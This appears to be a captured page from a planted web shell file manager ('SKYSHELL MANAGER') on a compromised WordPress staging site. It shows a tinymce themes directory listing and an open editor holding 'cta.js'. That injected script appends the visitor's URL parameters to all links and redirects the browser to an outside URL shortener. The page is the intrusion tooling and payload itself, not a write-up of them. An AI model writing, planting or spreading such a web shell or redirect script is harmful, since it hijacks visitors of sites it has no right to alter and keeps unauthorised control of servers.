📁
SKYSHELL MANAGER
PHP v8.1.34
Create
Create
Path:
root
/
home
/
thevaxnx
/
nativize.com
/
staging
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
wp-links-opml.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: cta.js
function getUrlParams() { const params = {}; const url = new URL(window.location.href); url.searchParams.forEach((value, key) => { params[key] = value; }); return Object.keys(params).length > 0 ? params : null; } function addUrlParamsToLinks(params) { if (params) { const queryString = new URLSearchParams(params).toString(); document.querySelectorAll('a').forEach(function(link) { if (link.href.includes('?')) { link.href += '&' + queryString; } else { link.href += '?' + queryString; } }); } } const currentParams = getUrlParams(); addUrlParamsToLinks(currentParams); window.location.href = "//https://ushort.org/PuAeyTvkH0r7";
Save